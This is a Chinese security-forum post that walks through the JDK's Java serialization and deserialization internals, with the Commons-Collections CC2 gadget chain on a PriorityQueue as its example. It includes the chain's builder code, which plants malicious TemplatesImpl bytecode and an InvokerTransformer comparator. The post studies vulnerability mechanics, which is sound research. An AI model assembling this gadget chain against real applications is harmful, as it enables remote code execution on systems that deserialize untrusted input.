安全矩阵

 找回密码
 立即注册
搜索
查看: 666|回复: 0

反序列化与序列化过程分析

[复制链接]

417

主题

417

帖子

2391

积分

金牌会员

Rank: 6Rank: 6

积分
2391
发表于 2023-8-15 09:52:41 | 显示全部楼层 |阅读模式
前言

在学习反序列化的漏洞时,大致都是了解了一些知识,比如序列化就是写入对象,反序列化就是读取文件恢复对象,在这个过程中会自动调用一些方法,readObject,writeObject,静态代码块等,但是从来没有了解过这个过程是怎么样的,一直很模糊,所以在这篇文章里面会记录整个学习过程,参考的技术文章较少,可能会有错误,希望理解

这里用cc2来举一个例子,并不解释cc2的原理,主要看一下是怎么写入序列化的数据怎么读取反序列化的数据

PriorityQueue的变量组成


因为在序列化的过程中,静态常量,由transient修饰的变量都不会被序列化,serialVersionUID这个变量也是,所以在序列化PriorityQueue的时候,只有以下两个变量是可以被序列化的,同时也是执行命令的关键

  1. private int size = 0;
  2. private final Comparator<? super E> comparator;
复制代码

cc2代码:

  1. public static void vulnToTemplatesImpl() throws IOException, CannotCompileException, NotFoundException, NoSuchFieldException, IllegalAccessException, ClassNotFoundException {
  2.         PriorityQueue priorityQueue = new PriorityQueue();
  3.         priorityQueue.add(1);
  4.         priorityQueue.add(1);
  5.         //获取恶意类的字节码
  6.         ClassPool pool = ClassPool.getDefault();
  7.         CtClass ctClass = pool.get("util.Evil");
  8.         byte[] evilPayload = ctClass.toBytecode();
  9.         //设置恶意字节码到TemplatesImpl中
  10.         TemplatesImpl templates = new TemplatesImpl();
  11.         SerializeUtil.setFieldValue(templates,"_name","v1f18");
  12. //        SerializeUtil.setFieldValue(templates,"_tfactory",new TransformerFactoryImpl());
  13.         SerializeUtil.setFieldValue(templates,"_bytecodes",new byte[][]{evilPayload});
  14.         InvokerTransformer invokerTransformer = new InvokerTransformer("newTransformer",null,null);
  15.         TransformingComparator transformingComparator = new TransformingComparator(invokerTransformer);
  16.         SerializeUtil.setFieldValue(priorityQueue,"comparator",transformingComparator);

  17.         Field queue = priorityQueue.getClass().getDeclaredField("queue");
  18.         queue.setAccessible(true);
  19.         Object[] o = (Object[]) queue.get(priorityQueue);
  20.         o[0] = templates;
  21.         SerializeUtil.writeObjectToFile(priorityQueue);
  22.         SerializeUtil.readObjectToFile();
  23.     }
复制代码

ObjectOutputStream过程分析
进入ObjectOutputStream的单参数构造方法中


进入verifySubclass


这个verifySubclass上面有注释,大致意思就是在不违反安全限制下序列化这个类

通过getClass返回当前类的class类,判断是否为ObjectOutputStream.class

一般来说代码就直接return回去了,只有其他类(不是ObjectOutputStream的子类)才会继续执行下面的代码(权限检查),本意就是保护ObjectOutputStream类的内部实现和数据完整性

接着往下走


bout是一个BlockDataOutputStream类,将序列化的数据写入out中

handles,subs一个用于管理内存中的数据结构,另一个用于替代对象,

进入writeStreamHeader方法

这里用于bout写入魔术头,在之前就了解过java的序列化数据开头为aced0005,这个魔术头就是在这里写入的,对应的两个魔术头参数:


继续往下,bout.setBlockDataMode(true)表示开启以块模式写入,这个块模式简单理解就是方便序列化数据的传输

然后接着往下走,查看extendedDebugInfo是什么:


这个表示是否开启调试信息

然后进入writeObject

enableOverride在构造方法里面已经设置了false

进入writeObject0


这个subs.lookup(obj),去寻找ReplaceTable中是否已经存在了obj的类,如果不存在就返回对象本身

handles.lookup(obj)也是一样的,如果没找到,则返回-1

接着往下跟


先获取obj的class对象赋值给cl,进入死循环,进入ObjectStreamClass.lookup(cl, true)方法


这个方法主要用来在缓存中查找是否存在要序列化的对象的class,如果没有就创建一个ObjectStreamClass,里面用于存放class类的一些信息

new WeakClassKey(cl, Caches.localDescsQueue)将cl与Caches.localDescsQueue分别对应Reference中的referent和queue

进入Caches.localDescs.putIfAbsent(key, newRef);

这里是将key(里面包含了PriorityQueue.class)和newRef做一个关联,代表这个cl已经处理过了


然后进入构造方法


这个构造方法里面就包含了关于class的类描述内容

有class对象,class的名称,serialVersionUID,是否重写了writeObject和readObject,以及一些没有被transient修饰的属性…


这里验证前面说的只有这两个变量是可以被序列化的,结束构造方法


结束ObjectStreamClass.lookup(cl, true)

返回writeObject0

obj.getClass()) == cl这个是恒成立的,直接break死循环出去

下面的enableReplace为false,这个enableReplace只有在ObjectOutputStream的子类中才有可能为true

下面的obj != orig也为false,在上面obj赋值给orig

然后运行到这:


这个就肯定得进入了,不然就要爆一个序列化的类没实现Serializable的错了

跟入writeOrdinaryObject


extendedDebugInfo调试信息为false,之前分析过了

检查是否能序列化

bout.writeByte(TC_OBJECT)写入0x73,进入:writeClassDesc


进入writeNonProxyDesc


写入0x72,进入writeClassDescriptor


跟进


写入class的name,反序列化suid,flags(对应class的类别),变量的个数

在下面写入最主要的关于变量的描述:

  1. for (int i = 0; i < fields.length; i++) {
  2.             ObjectStreamField f = fields[i];
  3.             out.writeByte(f.getTypeCode());
  4.             out.writeUTF(f.getName());
  5.             if (!f.isPrimitive()) {
  6.                 out.writeTypeString(f.getTypeString());
  7.             }
  8.         }
复制代码

结束返回到writeNonProxyDesc

这个时候可以用编辑器打开序列化的数据:


和分析的一样


这个annotateClass应该留给子类扩展的

进入writeClassDesc

注意参数desc.getSuperDesc(),PriorityQueue的AbstractQueue父类没有实现Serializable所以为空

返回null,执行到writeOrdinaryObject

进入writeSerialData

这里判断了是否重写WriteObject方法,PriorityQueue是有重写的,如果没有重写的话,就是另外的逻辑去写入数据了

进入到PriorityQueue的WriteObject

defaultWriteObject用来将具体的变量值写入序列化数据中

将PriorityQueue对象和PriorityQueue类描述符传入,进入defaultWriteFields

主要看这个for循环

desc.getFields(false)获取类的字段,就是那两个

desc.getNumObjFields()返回被修改的字段数,我们只修改了一个,所以返回1

进入getObjFieldValues看一下

继续

这个循环没看懂,大致意思应该就是把修改了的数据赋值吧

返回defaultWriteFields方法

循环这个objVals,其实这里就已经很明白了,就是通过递归的方式去写入数据

进入writeObject0

看这个obj和之前的PriorityQueue一样啊,这里就不再分析了,都是一样的流程

所以重写的writeObject的逻辑最主要的地方就是在defaultWriteObject里面

回到PriorityQueue的writeObject方法,最后就是看属性有没有重写writeObjet方法了

序列化的过程分析到这里结束

ObjectInputStream过程分析

进入ObjectInputStream的构造方法

这个verifySubclass和上面序列化时相同

bin:用于处理输入流的对象,将读取的数据进行解析

handles:与对象对应的表

vlist:反序列化完成之后需要执行的方法列表

进入readStreamHeader:

这里与序列化对应,判断前两个字节是否为0xaced0005

下面的setBlockDataMode就是开启以块模式读取

然后进入readObject方法

进入readObject0

获取当前的读取模式,这个在之前的构造方法里面设置了为true

bin.currentBlockRemaining()用于返回还没有读取的字节数

然后再由bin.setBlockDataMode(false)关闭块模式

bin.peekByte()用于查看下一个字节是否为最后一个字节

这里的bin.peekByte()读取的就是在序列化的时候写入的0x73,这里都是和序列化过程对应的

进入readOrdinaryObject

在这个方法里面有判断了一次是否为0x73

进入readClassDesc

这个方法主要返回类的描述信息,读取的tc为114对应的0x72

进入readNonProxyDesc

这个assign方法就是将desc这个对象和一个句柄绑定,这样就就可以通过句柄在句柄表中快速找到对应的对象

进入readClassDescriptor

这个就是读取类描述的主要方法了,看一下readNonProxy读取了哪些信息

类名称name,serialVersionUID,是否为代理对象,是否重写了WriteObject,以及成员变量等

这里的numFields也是和上面的序列化过程对应的两个可序列化的变量,然后创建长度为2的ObjectStreamField数组

看一下for循环

利用readByte读取下一个字节,readUTF读取类名信息

判断这个变量是什么类型的,比如我这里的第一个Isize,在创建ObjectStreamField的时候就会选择对应的类型:

其实在这里也写了[,L为Object类型,后面那个comparator变量就不分析了一样的

然后回到readNonProxyDesc方法,readDesc就是类描述的对象

进入resolveClass方法

这里其实就是类加载里面的一个过程,链接指定的类,说白了就是返回对应的类class对象

返回对应的PriorityQueue.class,注意这里的Class.forName的第二个参数为false即不初始化,所以不会去执行静态代码块

退出resolveClass

skipCustomData()方法用于跳过所有块数据和对象,直到遇到 TC_ENDBLOCKDATA。

然后进入initNonProxy()方法

先获取了serialVersionUID,进入lookup方法

和序列化的时候一样,返回对应的class描述对象osc,但是这里有一个在反序列化中常用的操作,就是去执行静态代码块,简单看一下就好了分两种情况

  • 类存在serialVersionUID变量,在new ObjectStreamClass(cl)的构造方法里面,会去调用getDeclaredSUID,getDeclaredSUID里面f.getLong(null),这里的f其实就是在获取对应的serialVersionUID参数


在第一次获取的时候,会导致类的加载和初始化,所以会去执行静态代码块,这个没法分析,底层都是c来写的,看不到源码

  • 不存在serialVersionUID变量,在initNonProxy的osc.getSerialVersionUID()[因为不存在serialVersionUID,所以需要去计算这个类的serialVersionUID]中存在computeDefaultSUID方法,来计算serialVersionUID,这里面就存在了如果有静态代码块的话就去执行



继续往下调试

在这个位置,对比了SerialVersionUID,如果不相同的话就会抛异常



然后这里就初始化了一些非代理类的描述参数

然后回到readNonProxyDesc方法

handles.finish(descHandle)这个方法应该表示对应的句柄已经使用完成,把这个descHandle标记成已经完成

然后回到readOrdinaryObject了

desc.checkDeserialize();检查是否允许对类的反序列化

获取对应的class赋值给cl

obj = desc.isInstantiable() ? desc.newInstance() : null;

检查这个类是否可以外部化并且(或父类)存在无参构造方法,则返回true,即创建对应的对象赋值给obj

然后下面还有一个需要关注的地方:

这个readSerialData中包含了我们是否需要执行用户自定义的readObject方法

如果有的话就会进入slotDesc.invokeReadObject(obj, this)来反射调用readObject,进入PriorityQueue的readObject方法

如果有的话就会进入slotDesc.invokeReadObject(obj, this)来反射调用readObject,进入PriorityQueue的readObject方法

进入defaultReadFields,将PriorityQueue对象和PriorityQueue描述传入

这里主要看这个for循环,这个代码看着非常熟悉,先获取全部的序列化变量,然后获取修改的变量个数

进入readObject0(f.isUnshared())

进入readOrdinaryObject

从这里开始就又开始递归了,这里简化一些

从readClassDesc方法读取下一个字节判断下一个字段的类型进入对应的方法readNonProxyDesc

从readClassDescriptor里读取类描述,然后从resolveClass获取对应类描述的类class,然后initNonProxy来对类描述初始化,而后在进入readSerialData进行读取变量数据,执行readObject,最后又开始递归直到任务完成即读完所有内容

最后进入到checkResolve

这个方法主要检查obj是否有效

然后回到readObject了

下面就是准备结束整个反序列化过程了,并且调用回调函数,到这里也就结束了。

总结

我这里没有去看cc2是如何执行命令的,而是侧重怎么把数据写入和读取,如果跟完整个过程,会发现其实本质上就是在自动的调用各处的代码,在这些自动调用的代码中寻找突破口已到达执行命令的目的



本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?立即注册

x
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

小黑屋|安全矩阵

GMT+8, 2024-11-28 13:44 , Processed in 0.014662 second(s), 19 queries .

Powered by Discuz! X4.0

Copyright © 2001-2020, Tencent Cloud.

快速回复 返回顶部 返回列表